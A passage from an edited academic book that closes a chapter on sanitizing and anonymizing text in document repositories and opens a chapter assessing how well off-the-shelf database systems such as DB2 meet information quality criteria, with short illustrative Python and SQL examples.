calls are recorded and then transcribed. A human annotator examines the transcriptions and assigns each a call-type from a set of predefined call-types. This data is then used to train automatic speech recognition and call classification components. Figure 3 presents an example dialog between an automated call center agent and a user. As is clear from this example, these calls may include very sensitive information, such as credit card and phone numbers, that needs to be sanitized before the data can be shared or made public. One problem with text sanitization is that the performance of state-of-the-art information extraction techniques is still far from perfect (especially when they are employed on previously unseen text or domains). In order not to miss any confidential information, one may trade precision for recall, which results in a larger number of falsely sanitized portions of text. With the value-class membership approach, any named entities that were missed will be easy to recognize. Thus, if the named entity extraction performance is low, using value distortion or dissociation methods would be more appropriate. Another problem is the domain dependency of the confidential information. For example, some named entities may be confidential in only some domains, such as drug names in medical reports vs. pharmaceutical company customer care center
recordings, requiring a list of the entities that should be sanitized.
Figure 3. Example dialog from an automatic call center recording and its sanitized version. Original dialog: "System: How may I help you? User: Hello. This is John Smith. My phone number is 9 7 3 area code 1 2 3 9 6 8 4. I wish to have my bill, long distance bill, sent to my Discover card for payment. My Discover card number is 2 8 7 4 3 6 1 7 8 9 1 2 5 7 hundred and it expires on first month of next year." Sanitized version: the same dialog with the caller's name, phone number, card name, card number, and expiration date each replaced by a generic token.

Text Anonymization
Text anonymization aims at preventing the identification of the author (who is also considered to be the owner) of a given text. In the case of speech, the speaker is considered to be the owner. Text anonymization is therefore necessary to protect the privacy of authors. For example, the reviewers of scientific papers usually prefer to remain anonymous, and in blind reviewing the same holds for the authors of the papers. We know that, using a state-of-the-art classifier, it is possible to identify the author of a text with very high accuracy. The features that can be used are the words and phrases (n-grams) in the text, the total number of tokens, the total number of different word types, the total number of characters, and the number of word types that occur only once. We have observed, through our experiments with a limited set of articles from a newspaper, that each author uses a characteristic frequency distribution over words and phrases. We use the k-anonymity of authorship defined in the section "k-Anonymity as a Privacy Measure in Documents" as the privacy metric for anonymization. For the anonymization process, we may assume a fixed
set of documents, such as a digital library that collects all the major works of a given set of authors. In this case, the authorship of some documents is known and that of others is not. However, we should also consider the case in which the adversary is able to find another set of documents by the same authors, for example by searching the Internet, where the number of documents that could be found is practically unlimited. Text classification techniques first parse the text to obtain the features. Each document is represented as a feature vector, where each feature may be represented by a real number. In the case of a fixed document set, let DP be the set of documents whose authorship information is public and DA be the set of documents whose authorship information is confidential. An adversary could train a classification model on DP to predict the authorship of a document in DA. Since DP is known and fixed, anonymization can work on both DP and DA. The basic approach for anonymization is to modify the documents in DP and DA in order to change their feature vectors so that data mining tools cannot classify the documents accurately. The most general model that an adversary may use is a classification model that returns a probability P(aj | di) for each author aj and a given document di. In this way, each author has a certain probability of being the author of a specific anonymous document. The basic approach for achieving k-anonymity is then to change the probability of the real author so that (s)he falls into a randomly selected position among the top k authors with the highest probability. The probabilities are changed by updating the documents in DP and DA. This process should be performed in such a way that the original meaning and coherence of the document are preserved. When DP is not fixed, the model that could be constructed by the adversary cannot be known in advance, which complicates the anonymization process. In this case, the approach would be to update the anonymous documents in such a way that their feature vectors look alike
to obscure the adversary. We can achieve this by changing the feature vectors such that at least k of the documents with different authors have the same feature vector; this can be done by taking the mean of the feature vectors of k documents with different authors and assigning the mean as the new feature vector of each of them. The anonymization method heavily depends on the features of the classifier used for authorship identification by the adversary. If the classifier only uses unigram word distributions, then anonymization can be achieved simply by replacing words with their synonyms or by mapping them to more generic terms, as is done in sanitization. If the classifier uses a different feature set, such as the distribution of stop words ("the" or "by") or of words with closed-class part-of-speech (word category) tags (that is, almost all words that are not nouns, verbs, or adjectives), then rephrasing the sentences would be a solution, as in text watermarking (Atallah et al., 2002). If the classifier uses other features, such as passive or active voice, specific clauses, or the average length of sentences, these need to be addressed specifically. If nothing is known about the features of the adversary's classifier, then the safest solution is to assume that it uses all the features we can think of and to anonymize the text accordingly.
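As a simplified illustration of the mean-feature-vector idea (our own sketch, not the implementation discussed here), the following Python code computes unigram feature vectors for k documents by different authors and the common target vector they could be rewritten toward; the documents and vocabulary are hypothetical.

from collections import Counter

def unigram_vector(text, vocabulary):
    """Relative frequency of each vocabulary word in the text."""
    counts = Counter(text.lower().split())
    total = sum(counts.values()) or 1
    return [counts[word] / total for word in vocabulary]

def mean_vector(vectors):
    """Component-wise mean of k feature vectors."""
    k = len(vectors)
    return [sum(component) / k for component in zip(*vectors)]

# Hypothetical anonymous documents by k = 3 different authors.
documents = [
    "the report was finished early because the data was clean",
    "results were obtained quickly since the corpus was small",
    "we finished the analysis because the sample was limited",
]
vocabulary = sorted(set(" ".join(documents).split()))
vectors = [unigram_vector(doc, vocabulary) for doc in documents]
target = mean_vector(vectors)

# Each document would then be rewritten until its vector approaches `target`,
# leaving the adversary's classifier unable to separate the k authors.
print([round(x, 3) for x in target])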
Discussion of a System for Preserving Privacy in Document Repositories
A system for anonymization and sanitization is depicted in Figure 4. As can be seen in the figure, sanitization and anonymization can be viewed as a layer between the media through which users interact and the document repository. Users may create a document using an editor and, upon their request, the document may be sanitized before it is stored. The same process works in the opposite direction as well: when a user wants to view a document, the document can be sanitized (if it is stored in its original form in a trusted document repository) before it is viewed.

Figure 4. Sanitization and anonymization for documents (the figure shows an editor or browser exchanging documents with a document repository through a sanitization/anonymization layer; in each direction, documents pass through the layer and may be turned into sanitized documents)
Data Quality Measures for Text
We need to make sure that data quality is still preserved after sanitization. Data quality can be measured in terms of readability and the ability to use the sanitized text for the corresponding task. For example, if the data is going to be used for text classification, it is necessary to perform sanitization without deteriorating the classification performance. If the task is information retrieval, sanitization methods should not interfere with the indexing and document matching methods. Information hiding aims at inserting additional information into any kind of digital media (Katzenbeisser & Petitcolas, 2000). This information can be a concealed message to be read only by specific people and not by other parties (steganography), a code identifying or protecting the owner (watermarking), or a code identifying the receiver (fingerprinting). The availability of media in digital form has made unauthorized copying and distribution very easy, increasing the concerns about, and therefore the research on, protecting copyright.
One recent study on text watermarking digitizes the sentence using its syntactic parse tree, embeds the hidden information into the tree by changing its structure, and regenerates a new sentence with the same meaning from this structure (Atallah et al., 2002). The subject of this chapter is not inserting hidden information into text; instead, it is hiding the sensitive information in the text without distorting its meaning. However, evaluation measures can be shared across the information hiding, sanitization, and anonymization tasks, since all have the requirement that they should not change the meaning and the coherence of the original text during the update process. Possible information-theoretic measures for data quality are the Kullback-Leibler distance and the change in conditional entropies, the details of which can be found in Cover and Thomas (1991).
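For illustration, the following Python sketch (our own, with a small smoothing constant added so that the quantity stays finite) estimates the Kullback-Leibler distance between the word distributions of an original and a sanitized text; the texts are hypothetical.

import math
from collections import Counter

def word_distribution(text, vocabulary, smoothing=1e-6):
    """Smoothed relative word frequencies over a fixed vocabulary."""
    counts = Counter(text.lower().split())
    total = sum(counts.values()) + smoothing * len(vocabulary)
    return {w: (counts[w] + smoothing) / total for w in vocabulary}

def kl_distance(p, q):
    """Kullback-Leibler divergence D(p || q) in bits."""
    return sum(p[w] * math.log2(p[w] / q[w]) for w in p)

original = "Mr. Brown was admitted to emergency and Dr. Green performed a CT scan"
sanitized = "<NAME> was admitted to emergency and <NAME> performed a CT scan"

vocabulary = set(original.lower().split()) | set(sanitized.lower().split())
p = word_distribution(original, vocabulary)
q = word_distribution(sanitized, vocabulary)
print(round(kl_distance(p, q), 4))  # small values indicate little distortion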
FUTURE TRENDS
Standards for privacy policies and privacy preference specifications are being developed under the W3C with the Platform for Privacy Preferences (P3P) Project (http://www.w3.org/P3P/). A method for implementing the P3P standard was proposed
using database technology by Agrawal, Kiernan, Srikant, and Xu (2003). As a future research direction, sanitization and anonymization tools should consider the privacy preferences of users and the privacy policies of data collectors. Another important aspect is the development of online techniques for sanitization and anonymization. This is becoming increasingly important, especially with emerging portals that offer online e-mail scanning capabilities. Threats that occur due to data integration from multiple sources need further investigation. Simply preprocessing the data may not be enough to ensure privacy. Data integration and record linkage can be used to identify individuals from data sources sanitized by different mechanisms and different policies. For example, the same type of text collected from different sources may be released in sanitized form; however, due to inconsistent sanitization policies, one source may sanitize the names while another sanitizes the sensitive data values. Standardization of sanitization mechanisms and policies for specific data types is needed to ensure privacy in large-scale distributed document repositories.
CONCLUSION
In this chapter, we identified the privacy issues in document repositories and pointed out some approaches to tackle the privacy protection problem. The ideas we presented aim to identify the problem and propose some initial solutions to it, combining existing technology from natural language processing and data mining. These initial ideas will hopefully lead to more research in this direction and to the development of tools, between the users of documents and the storage medium, that ensure the privacy requirements. With the privacy issues in text identified, tools for protecting privacy can be developed, which will lead to the release of more text data without the need for money- and time-
consuming text preprocessing done by humans. In sum, text sanitization and anonymization will ensure the privacy of individuals and serve to increase the richness of data sources on the Web.
REFERENCES
Adam, N.R., & Wortmann, J.C. (1989). Security-control methods for statistical databases: A comparative study. ACM Computing Surveys, 21(4), 515-556.
Agrawal, R., Kiernan, J., Srikant, R., & Xu, Y. (2003). Implementing P3P using database technology. Proceedings of the 19th International Conference on Data Engineering, March, Bangalore, India.
Agrawal, R., & Srikant, R. (2000). Privacy preserving data mining. Proceedings of the SIGMOD Conference (pp. 45-52).
Atallah, M., Raskin, V., Hempelmann, C., Karahan, M., Sion, R., Topkara, U., & Triezenberg, K. (2002). Natural language watermarking and tamperproofing. Information Hiding, 96-212.
Clifton, C., & Kantarcioglu, M. (2004). Privacy-preserving distributed mining of association rules on horizontally partitioned data. IEEE Transactions on Knowledge and Data Engineering, 16(9).
Cohen, W. (2000). Data integration using similarity joins and a word-based information representation language. ACM Transactions on Information Systems, 18(3), 288-321.
Conway, R., & Strip, D. (1976). Selective partial access to a database. Proceedings of the ACM Annual Conference.
Cover, T.M., & Thomas, J.A. (1991). Elements of information theory. New York: John Wiley & Sons.
Evfimievski, A., Srikant, R., Agrawal, R., & Gehrke, J. (2002). Privacy preserving mining of association rules. Proceedings of the 8th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining (pp. 217-228).
Hakkani-Tür, D., Tur, G., Stolcke, A., & Shriberg, E. (1999). Combining words and prosody for information extraction from speech. Proceedings of EUROSPEECH'99, 6th European Conference on Speech Communication and Technology, Budapest, Hungary.
Katzenbeisser, S., & Petitcolas, F. (Eds.) (2000). Information hiding techniques for steganography and digital watermarking. Norwood, MA: Artech House.
Oakes, M. (1998). Statistics for corpus linguistics. Edinburgh University Press.
Oliveira, S., & Zaïane, O. (2002). Privacy preserving frequent itemset mining. Proceedings of the IEEE ICDM Workshop on Privacy, Security and Data Mining (pp. 43-54).
Oliveira, S., & Zaïane, O. (2003). Protecting sensitive knowledge by data sanitization. Proceedings of the 3rd IEEE International Conference on Data Mining (ICDM'03) (pp. 613-616).
Rizvi, S., & Haritsa, J. (2002). Privacy-preserving association rule mining. Proceedings of the 28th International Conference on Very Large Data Bases.
Ruch, P., Baud, R.H., Rassinoux, A.M., Bouillon, P., & Robert, G. (2000). Medical document anonymization with a semantic lexicon. Journal of the American Medical Informatics Association.
Samarati, P., & Sweeney, L. (1998). Protecting privacy when disclosing information: k-Anonymity and its enforcement through generalization and suppression. SRI-CSL-98-04, Computer Science Laboratory, SRI International.
Saygin, Y., Verykios, V.S., & Clifton, C. (2001). Using unknowns to prevent the discovery of association rules. SIGMOD Record, 30(4), 45-54.
Sweeney, L. (1996). Replacing personally-identifying information in medical records, the Scrub system. Proceedings of the American Medical Informatics Association Meeting (pp. 333-337).
Sweeney, L. (2002). k-Anonymity: A model for protecting privacy. International Journal on Uncertainty, Fuzziness and Knowledge-based Systems, 10(5), 557-570.
Tur, G. (2000). Automatic authorship identification (Technical Report). Retrieved May 3, 2005, from http://www.research.att.com/~gtur/pubs.html
Vaidya, J., & Clifton, C. (2004). Privacy preserving Naïve Bayes classifier for vertically partitioned data. Proceedings of the 2004 SIAM Conference on Data Mining, Lake Buena Vista, FL.
Verykios, V.S., Elmagarmid, A., Bertino, E., Saygin, Y., & Dasseni, E. (2004). Association rule hiding. IEEE Transactions on Knowledge and Data Engineering, 16(4), 434-447.
This work was previously published in Web and Information Security, edited by E. Ferrari and B. Thuraisingham, pp. 133-148, copyright 2006 by IRM Press (an imprint of IGI Global).
Chapter 7.11
Information Quality:
How Good are Off-the-Shelf DBMS? Felix Naumann Humboldt-Universität zu Berlin, Germany Mary Roth IBM Silicon Valley Lab, USA
ABSTRACT
Commercial database management systems (DBMS) have come a long way with respect to efficiency and, more recently, with respect to quality and user friendliness. Not only do they provide an efficient means to store large amounts of data and intuitive query languages to access the data; popular DBMS also provide a whole suite of tools to assess, store, manage, clean, and retrieve data in a user-friendly way. Some of these features address database experts; others are targeted at end users with little or even no database knowledge. The recent developments in the field of autonomic computing drive the ease of use even further. In this chapter we study how well a typical DBMS meets the goal of providing a high-quality data storage and retrieval facility. To this end, we draw on an established set of information quality criteria and assess how well an exemplary DBMS fares. While quality criteria
are usually defined for a set of data, we extend, wherever possible, the definitions to the systems that manage this data.
THE QUALITY-IN-QUALITY-OUT PRINCIPLE
Arguably the most widespread architecture to store, manage, and retrieve structured data is the relational database management system (DBMS) architecture. Starting with IBM's System R (Astrahan, 1979), which evolved into the IBM DB2 database system, today there are many commercial systems storing petabytes of data. Other prominent examples are the Oracle database,1 Microsoft's SQL Server,2 and MySQL.3 Other data models, such as the object-oriented model or the hierarchical model, are also widespread but are not discussed here. The information quality provided by a database is not due to the data model itself, but to the
system carefully managing the data. Thus, database systems with other data models enjoy the same information quality properties. Research and development for DBMS follows two main directions: scalability and usability. With the growing demand to store more and more data, database systems have scaled in the hardware they use and in the software managing the data. Additionally, administrators of databases and end users of the data demand more and more functionality that either adds value to the DBMS or makes its use easier. In this chapter, we analyze how well modern DBMS are able to meet user demands, or at least help database administrators (DBAs) meet user demands, regarding their everyday work with the DBMS or applications built on top. Here, user demands are expressed as a set of information quality criteria taken from the empirical study of Wang and Strong (1996). Information quality is a measure to assess the value of data to perform the task at hand (Wang, 1996). Other definitions mention fitness for use (Tayi, 1998) or user satisfaction (Delone, 1992). As DBMS are one of the most common means to generate, manage, and provide this data, it is worthwhile to examine how they influence the quality of the information they handle. This influence is both explicit, within the core functionality of a DBMS, and implicit, through tools that help data providers, developers, managers, and consumers derive the most value from the data. To examine DBMS with respect to the quality of information they are able to supply, we apply a large set of IQ criteria to the DBMS as an entire system. Usually, IQ criteria are used to assess the quality of information, not the quality of a system. Addressing this mismatch, we analyze not the DBMS itself, but its ability to provide high-quality data. DBMS are not the sole source of high information quality, but they are designed to at least not diminish quality. While the well-known garbage-in-garbage-out principle holds for any system dealing with data, we postulate the quality-in-quality-out principle for modern,
well-designed DBMS. For instance, if data is generated and inserted into a DBMS in a timely manner, a good DBMS will not unduly delay the accessibility of the data to users. Another example is the completeness of information: DBMS are developed to always return complete (and correct) answers to queries. Only if the stored base data is incomplete or incorrect will a DBMS answer with an inferior result. In this spirit we analyze several quality dimensions and provide details on if and how a typical DBMS meets IQ demands. In this chapter we ignore the issue of software quality and assume a DBMS that correctly implements the SQL standard and its added functionality.
Structure of this Chapter
In the following section we introduce IBM's DB2 database system as a typical representative of commercial DBMS. Additionally, we present three different roles that DBMS users take on, each with different needs regarding information quality and each with different demands on a DBMS. In the third section we enumerate a comprehensive set of information quality criteria and discuss, for each, whether and how a DBMS used in the different roles affects them. We conclude with a discussion of future work in the fourth section and a summary of our findings in the last section.
Database Management Systems and Their Users
A software product, such as a database management system (DBMS), is used by many different persons with different educational backgrounds, different IT needs, and, most importantly, with different roles inside an organization. These roles are the basis of our assessment of DBMS quality.
DB2 Universal Database: A Typical, Off-the-Shelf Database Management System
Figure 1 illustrates a layered DBMS architecture that has evolved over the past 30 years of relational database technology evolution and is typical of most DBMS products in the marketplace. Requests to the DBMS are formulated in a semantically rich, declarative language and submitted via a command line or programming interface. SQL (Structured Query Language, [ISO, 1999]) has developed as the standard language for manipulating relational data, and interfaces such as JDBC and ODBC have evolved as the standard programming APIs by which SQL requests are submitted to the DBMS. Graphical tools, packaged and custom applications submit SQL requests through these programming interfaces. The maturity and wide adoption of these standards ensures that a wide variety of documentation is available to describe their use.
A query processor sits below the DBMS interface layer and executes requests to store and retrieve data as efficiently and robustly as possible. The query processor is made up of multiple components that work together to transform a declarative request for data into a series of executable steps that satisfy the request. The top-level component is the query parser, which relies on a lexical analyzer and parser to interpret the request and populate a data graph that captures the semantics of the request. This data graph is passed to a query optimizer that analyzes the graph and explores several strategies for answering the request, eventually choosing the most efficient plan according to some criterion, such as minimizing response time or resource utilization, or maximizing throughput. Once a plan has been selected, the code generator generates code to implement the plan. The runtime execution engine executes the code, interacting with a storage manager to retrieve and combine the appropriate data to fulfill the original request.
Figure 1. A generic DBMS architecture
The query processor handles not only requests to retrieve data, but it also handles requests to insert, update and delete data in the database. Such operations may be performed concurrently by multiple users. System services such as transaction management, concurrency control, logging, and recovery, maintain the ACID properties of a database that enable a DBMS to safely support concurrent query, insert, update, and delete operations by multiple users. ACID stands for atomicity, consistency, isolation, and durability (for details beyond the following brief descriptions of the properties see Graefe, 1993). Atomicity refers to “all or nothing” behavior for database operations. Operations that must be logically performed together are grouped into transactions, and the DBMS provides transaction management services to ensure that either all or none of the operations of a transaction are performed in order to preserve a consistent view of data. For example, a bank transfer requires removing money from one account and adding it to another. The Atomicity property of the database ensures that if the operations are grouped together in a transaction, then a partial update — removing money from the first account without adding it to the second — will not occur. Consistency refers to maintaining a consistent view of the data in the database both internally and with respect to the applications that access the data. Consistency is enforced by a DBMS by the services that provide atomicity and isolation. A committed transaction takes a database from one consistent state to another consistent state. For example, the two bank accounts of the previous example are in a consistent state before a transfer occurs. During the execution of the transaction, the database is temporarily inconsistent when the money is removed from one account but not yet added to the second account. However, after the transaction commits, the two bank accounts are again in a consistent state, with money successfully transferred from the first account to the second account.
Isolation ensures that concurrent users of a database will execute their transactions in isolation and not interfere with each other's operations. For example, if Felix and Mary both initiate a transfer of funds for the same set of bank accounts, the DBMS's locking and concurrency services ensure that either Felix's transaction will execute to completion before Mary's, or vice versa. Thus, Mary will not see Felix's partial updates (e.g., the value of the account being transferred to), nor will Felix see Mary's partial updates. Durability refers to the property that any transaction committed to the database will not be lost. Durability is maintained by the DBMS through logging and database recovery services. Logging records the state of database transactions, including whether they were committed, and database recovery restores a database to a consistent state in the event of a hardware or software failure. For example, when the transaction transferring money from one account to another is committed, the DBMS records enough information about the transaction to preserve its effects even in the event of a hardware failure. Many of the challenges in information quality arise when integrating data from many autonomous sources. Duplicates appear when a real-world object is represented in more than one source, information is "tainted" when integrated with data from an untrustworthy source, and completeness can be increased through integration. At the same time, DBMS vendors have put great effort into introducing integration capabilities into their base DBMS products. These capabilities appear as data warehousing environments, as federated database management systems, such as IBM's Information Integrator, or as grid-enabled DBMS, such as Oracle's 10g database. In fact, many of the integration technologies have become fundamental components of the DBMS. Thus, in the following discussions we include DBMS integration technology whenever applicable to the IQ criterion at hand.
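To make the bank-transfer example concrete, here is a minimal Python sketch using the SQLite library purely for illustration; commercial DBMS such as DB2 provide the same atomicity guarantee through their own drivers, and the table and account values are hypothetical.

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE accounts (id INTEGER PRIMARY KEY, balance INTEGER)")
conn.executemany("INSERT INTO accounts VALUES (?, ?)", [(1, 500), (2, 100)])
conn.commit()

try:
    with conn:  # one transaction: both updates commit, or neither does
        conn.execute("UPDATE accounts SET balance = balance - 200 WHERE id = 1")
        conn.execute("UPDATE accounts SET balance = balance + 200 WHERE id = 2")
except sqlite3.Error:
    pass  # on failure the partial update is rolled back automatically

print(conn.execute("SELECT id, balance FROM accounts ORDER BY id").fetchall())
# -> [(1, 300), (2, 300)]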
Users that interact with a DBMS directly typically rely on two types of graphical tools. Such tools are either packaged with the database itself or produced by third party vendors. Administrative tools, such as DB2’s Control Center or Oracle’s Enterprise Manager are used to configure and maintain the database, including such tasks as defining database layout, governing user access to the data, monitoring performance, and scheduling backups to ensure the data is recoverable in the event of a failure. Application development tools, such as DB2 Development Center, Computer Associates Erwin Data Modeler, or Rational Rose, are used to create database artifacts that are used by applications, including such tasks as developing models of the data required for an application, or generating functions and stored procedures that encapsulate much of the data access logic for the application. In conclusion, large database vendors offer the same or similar base functionality, which is the focus of our research. We do mention DB2’s additional functionality that is particular to information quality improvement.
Roles of DBMS Customers
An exhaustive analysis of DBMS use may identify a large population of DBMS users, each with distinct purposes and roles. Rather than address all of these roles, we focus our attention on three important DBMS customers (shown in Figure 2), each with different needs with respect to information quality and each with different means to improve IQ.

Figure 2. Three roles for DBMS usage (the administrator uses administrative tools, the developer uses application development tools to create applications, and the business manager uses those applications; tools and applications access the DBMS engine, which maintains the data, through interfaces such as SQL, ODBC, and JDBC)

• Administrator: Database administrators are trained DBMS experts who install and maintain DBMS and accompanying tools. Their role is to manage the integrity, security, and overall performance of a DBMS system, including such tasks as scheduling backups and database reorganization activities, optimizing storage layout, tuning performance in response to application requirements, and managing user access to the data. Administrators often use the administrative graphical tools and command line interface shown in
Figure 1 to perform their tasks.
• Developer: Application developers create software to support a particular business need. An application developer works with a domain expert to define the application requirements, architect a solution, and implement application code to meet those requirements. The application is typically composed of distinct software components that encapsulate the logic for a particular aspect of the solution, and application developers specialize in component areas. For example, an application that produces a daily report of business transactions might be composed of a component that runs queries against the database to retrieve the day's transaction information, a component that combines and summarizes the data according to specific business rules, and a Web-based interface that formats the information in an easy-to-read format. Application developers typically use application development tools and the programming interface illustrated in Figure 1 to implement their applications.
• Business Manager: A business manager relies on applications developed by application developers in order to make robust business decisions. The health and robustness of the database and the applications built on top are critical to the line of business; success and profitability often depend on the reliability and quality of the information produced by the applications. If a DBMS that stores order information is unavailable for several hours, business transactions cannot occur and the business loses revenue. If data is corrupted by the DBMS or if information is computed incorrectly, the business may be subject to fines or penalties.
THE QUALITY OF DATABASE MANAGEMENT SYSTEMS
We analyze a set of information quality criteria from the perspective of the three distinct customer roles described above. There have been many attempts to collect and classify IQ criteria, most notably the empirical study of Wang and Strong (1996), in which the authors aggregated survey results to find a list of 15 IQ criteria. Here, the IQ criteria are ordered according to that classification, but we extend the set at appropriate places with several criteria that are of particular importance to DBMS users (and at which DBMS excel). For convenience, we quote the definitions of Wang and Strong (1996).
Intrinsic IQ Criteria
Believability
“Believability is the extent to which data are accepted or regarded as true, real, and credible” (Wang, 1996). In a sense, believability is the expected accuracy. Due to the ACID properties described earlier, DBMS faithfully report data as it was entered into the database. A main source for doubts in the accuracy of data is the difficult formulation of complex SQL queries. Thus, managers must rely on the ability of developers to correctly write and document queries that have the desired semantics. Research has developed methods to automatically detect dubious queries and subqueries and issue warnings to the developer (Brass, 2002). For instance, some queries always produce empty results because they contain mutually exclusive filtering predicates. Such techniques have not yet found their way into commercial DBMS. However, given high quality data and a correct query (i.e., a query that reflects the semantics of the application), the produced query result is guaranteed to be correct. Through the very good
track record of DBMS, developers and managers worldwide nowadays entrust DBMS with even their most business-critical data, proving a strong belief that DBMS will correctly produce and transform the data that is stored within.
Accuracy
“Accuracy is the extent to which data are correct, reliable, and certified free of error” (Wang, 1996). It is typically determined as the quotient of the number of correct values in a database and the overall number of values in the database. With respect to the data as it is accessible, a DBMS always provides accurate answers to a query (in terms of DBMS, this property is called correctness). This IQ criterion best exemplifies the quality-in-quality-out principle of DBMS. Correctness, and thus accuracy, is ensured by the use of checksums, locks, and other methods of transaction processing. In particular, DBMS provide durability (the D in ACID), so that no data is lost. Since the main goal of a DBMS is to store data faithfully, vendors take great care to ensure the accurate insertion of data and the precise delivery of that data in response to queries. General DBMS have no means to automatically correct inaccurate data. They do, however, provide some means to detect inaccurate data: through the usage of pre-defined and user-defined types (UDTs), a DBMS verifies whether a data value conforms to the syntactic definition of its type. Furthermore, administrators can implement triggers that perform certain actions and issue warnings when a possibly incorrect value, such as an outlier, is inserted into the database.
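As a small illustration of such checks, the following sketch declares a CHECK constraint that rejects implausible salary values at insertion time; it uses SQLite syntax for convenience (DB2 and other commercial DBMS offer equivalent constraints and triggers), and the table and bounds are hypothetical.

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("""
    CREATE TABLE employees (
        name   TEXT NOT NULL,
        salary INTEGER CHECK (salary BETWEEN 10000 AND 1000000)
    )
""")

conn.execute("INSERT INTO employees VALUES ('Alice', 65000)")   # accepted
try:
    conn.execute("INSERT INTO employees VALUES ('Bob', -5)")    # rejected
except sqlite3.IntegrityError as error:
    print("rejected:", error)  # CHECK constraint failed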
Objectivity
“Objectivity is the extent to which data are unbiased, unprejudiced, and impartial” (Wang, 1996). It is trivial to show that DBMS have perfect objectivity: The durability property of DBMS ensures that data entered into a database
is not changed. Since DBMS are fully automatic machines and software, they are not prejudiced and are always impartial.
Reputation
“Reputation is the extent to which data are trusted or highly regarded in terms of their source or content” (Wang, 1996). Arguments similar to those for the Objectivity criterion also hold with respect to the reputation a DBMS conveys. In fact, there are occasions when the reputation of the DBMS increases the reputation of the data stored within. Major DBMS vendors, such as IBM, Oracle, and Sybase, have successfully marketed mature DBMS products for many years and have thus gained a high reputation. It should be noted that much of this reputation stems not from the quality of the data stored inside, but from ease of use, ease of maintenance, and marketing. IT managers have a tendency to trust data coming from a reputed DBMS more than data from other, less renowned IT products.
Contextual IQ Criteria
Value-Added
“Value-Added is the extent to which data are beneficial and provides advantages from their use” (Wang, 1996). Apart from simply storing data and retrieving data upon request, modern DBMS have many capabilities to add value to data. In Wiederhold (1997) the authors provide a list of features that DBMS (and in particular federated DBMS) may provide to add value to the base data. These features include simple aggregation of data, which almost every DBMS is able to provide, search capabilities (such as those provided by DB2 Net Extender) to allow key-word searching, triggers to automatically react to certain events, and so forth. Many of the features listed there are directly provided by DBMS. For the rest, DBMS have standard interfaces so that
third-party vendors can implement appropriate business intelligence applications on top of the DBMS. IBM’s Information Integrator provides the ability to integrate multiple information sources within a single federated system, thereby directly providing value through integration, and indirectly through various capabilities for federated systems.
Relevancy
“Relevancy (or relevance) is the extent to which data are applicable and helpful for the task at hand” (Wang, 1996). DBMS can improve the relevancy of data with two techniques: the ability to declaratively select appropriate data and thus avoid redundant or irrelevant data, and the ability to access additional, remote data. Using the declarative SQL language, developers can implement pre-defined views that select and filter data according to the application and according to the needs of the business manager consuming the data. SQL views can limit the set of columns of an exported data set and can limit the rows of the data set according to some filter predicates. Using technology to federate multiple, heterogeneous, and remote data sources, federated DBMS, such as IBM's Information Integrator, are able to greatly increase the amount of data accessible to the developer. Thus, developers are given more freedom to include relevant sources and improve relevancy (and completeness) in the final, integrated result: the percentage of relevant data compared to all available data can be increased.
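A minimal sketch of such a pre-defined view, again using SQLite purely for illustration and with hypothetical table and column names, might look as follows.

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE orders (id INTEGER, region TEXT, amount REAL, internal_note TEXT)")
conn.executemany("INSERT INTO orders VALUES (?, ?, ?, ?)",
                 [(1, 'EU', 120.0, 'rush'), (2, 'US', 80.0, 'n/a')])

# The view exposes only the relevant columns and rows for a European
# business manager; the internal_note column is hidden entirely.
conn.execute("""
    CREATE VIEW eu_orders AS
    SELECT id, amount FROM orders WHERE region = 'EU'
""")
print(conn.execute("SELECT * FROM eu_orders").fetchall())  # -> [(1, 120.0)]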
Timeliness
“Timeliness is the extent to which the age of the data is appropriate for the task at hand” (Wang, 1996). Commercial DBMS provide several means to optimize the timeliness of data. At the database core level, DBMS ensure timeliness by making
updates to the data visible immediately after the updating transaction is completed. High timeliness is jeopardized when the same data is stored at multiple locations and then updated at only one location. Only after such updates are propagated to the other copies is the data once again up-to-date. Unfortunately, DBMS frequently duplicate data to ensure high response times. For instance, data accessed by a remote client is often cached at the client side. Another example is the deliberate replication of data at multiple clients. Finally, materialized views store pre-calculated query results from base data. In all cases, updates to the base data are not immediately reflected in the copies. To improve timeliness, DBMS have implemented different schemes of update propagation, such as those available with DB2 Information Integrator Replication Server. Such replication offerings often support flexible latency characteristics for update propagation (continuous, event-driven, or scheduled), as well as transaction-consistent and table-at-a-time replication. Finally, there has been much applied research on the so-called view-update problem (Lehner, 2000).
Completeness
“Completeness is the extent to which data are of sufficient breadth, depth, and scope for the task at hand” (Wang, 1996). Usually, completeness can be measured as the number of records in a database, assuming that larger numbers are of higher utility (breadth). In Naumann (2004), we introduce a completeness definition that also accounts for the number of attributes of records and the number of (useless) null values in a database. The arguments to support our claim that completeness is well accounted for by DBMS are similar to the ones for the accuracy criterion. In a sense, completeness is built into databases, and with respect to the data as it is accessible a DBMS always provides complete answers to a query. It must be noted that this interpretation
of completeness relates to the data stored in the database and not to the data that is necessary or relevant for the application at hand. Completeness is of great importance and particular difficulty when integrating multiple data sources. All modern DBMS provide flexible means to access remote data sources, either by supporting extract-transform-load (ETL) processes to fill data warehouses (materialized integration) or by providing federated access to remote sources at query time (virtual integration). Many ETL vendors, such as Ascential Datastage or Oracle Warehouse Builder, supply advanced ETL tools that unburden administrators from programming individual transformations and instead allow them to concentrate on the high-level definition of entire transformation processes. For virtual integration, extensive tooling exists to define so-called wrappers, which automatically translate and distribute queries to appropriate remote sources. The ability of wrappers to access sources of many different types and flavors (XML, Excel, flat files, other DBMS, Web services, etc.) helps administrators improve completeness by wrapping all sources relevant to a particular domain (see, for instance, the DB2 XML Wrapper in Josifovski (2003a) and a tool to easily create one in Josifovski (2003b)). For example, consider a typical insurance claim, which may include account information stored in a relational database, photographs stored in a content management system, and a police report received as an XML document. Virtual integration enables the insurance application to view all of this data as though it were stored and queried through a single interface.
Appropriate Amount of Data
“Appropriate amount of data is the extent to which the quantity or volume of available data is appropriate” (Wang, 1996). While selecting the set and amount of data that is just right for the task at hand is a difficult problem, DBMS help developers achieve this goal in two ways.
